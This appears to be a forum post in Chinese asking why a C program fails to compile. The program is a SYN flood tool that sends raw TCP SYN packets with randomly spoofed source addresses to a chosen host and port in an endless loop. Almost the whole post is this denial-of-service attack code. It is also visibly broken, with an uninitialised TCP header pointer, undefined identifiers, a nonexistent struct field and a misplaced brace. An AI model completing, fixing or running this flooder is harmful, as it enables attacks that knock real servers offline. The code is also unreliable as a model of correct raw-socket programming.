|
源代码如下:
#include<sys/socket.h>
#include<arpa/inet.h>
#include<netinet/in.h>
#include<netdb.h>
#include<ctype.h>
#include<stdio.h>
#include<stdlib.h>
#include<netinet/ip.h>
#include<netinet/tcp.h>
#include<errno.h>
#include<unistd.h>
#include<sys/types.h>
#include<fcntl.h>
/*******************************************
*write_syn(int sockfd,struct sockaddr_in *addr)*
*******************************************/
void write_syn(int sockfd,struct sockaddr_in *addr)
{
char buf[56];
struct tcphdr *tcp;
struct ip *ip;
int len;
len=sizeof(struct ip)+sizeof(struct tcphdr);
bzero(buf,sizeof(buf));
/*tcp=(struct tcphdr*)(buf+sizeof(struct ip));*/
tcp->th_sport=htons(1500);
tcp->th_dport=addr->port;
tcp->th_seq=random();
tcp->th_ack=0;
tcp->th_off=5;
tcp->th_flags=TH_SYN;
ip=(struct ip*)buf;
ip->ip_v=IPVERSION;
ip->ip_hl=sizeof(struct ip)>>2;
ip->ip_tos=0;
ip->ip_len=htons(on);
ip->ip_id=0;
ip->ip_off=0;
ip->ip_ttl=TTL_OUT;
ip->ip_p=IPPROTO_TCP;
ip->ip_sum=0;
ip->ip_dst=addr->sin_addr;
for(;;){
ip->ip_src.s_addr=random();
tcp->th_sum=tcpcksum(ip);
sendto(sockfd,buf,len,0,addr,sizeof(struct sockaddr_in));
}
}
/**********************************************************
tcpcksum(struct ip *ip)
**********************************************************/
unsigned short tcpcksum(struct ip*ip)
{
struct tcphdr *tcp;
unsigned short *sptr,len;
unsigned long tcksum;
int i;
tcksum=0;
tcp=(struct tcphdr*)(ip+1);
sptr=(unsigned short *)ip->ip_src;
for(i=0;i<4;i++)
tcksum+=sptr++;
sptr=(unsigned short *)tcp;
len=ip->ip_len-ip->ip_hl<<2;
tcksum+=IPPROTO +len;
if(len%2){
((char*)tcp)[len]=0;
len+=1;
}
len>>=1;
for(i=0;i<len;i++)
{
tcksum+=*sptr++;
tcksum=(tcksum>>16)+(tcksum&0xffff);
tcksum+=(tcksum>>16);
return(short)(tcksum&0xffff);
}
int main(int argc,char *argv[])
{
int sockfd;
struct sockaddr_in addr;
struct hostent *he;
int on=1;
if(argc!=3){
printf("usage:syn port \n");
exit(1);
}
bzero(&addr,sizeof(addr));
addr.sin_family=AF_INET;
addr.sin_port=htons(atoi(argv[2]));
if(inet_aton(argv[1],&addr.sin_addr)==0){
he=gethostbyname(argv[1]);
if(he==NULL){
printf("host name error:%s %s\n",argv[1],hstrerror(h_errno));
exit(1);
}
addr.sin_addr=*(struct in_addr *)*he->h_addr_list[0];
}
sockfd=socket(AF_INET,SOCK_RAW,0);
if(sockfd<0){
printf("sock error:%s \n",strerror(errno));
exit(1);
}
setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on));
setuid(getpid());
write_syn(sockfd,&addr);
}
编译出错如图: |
|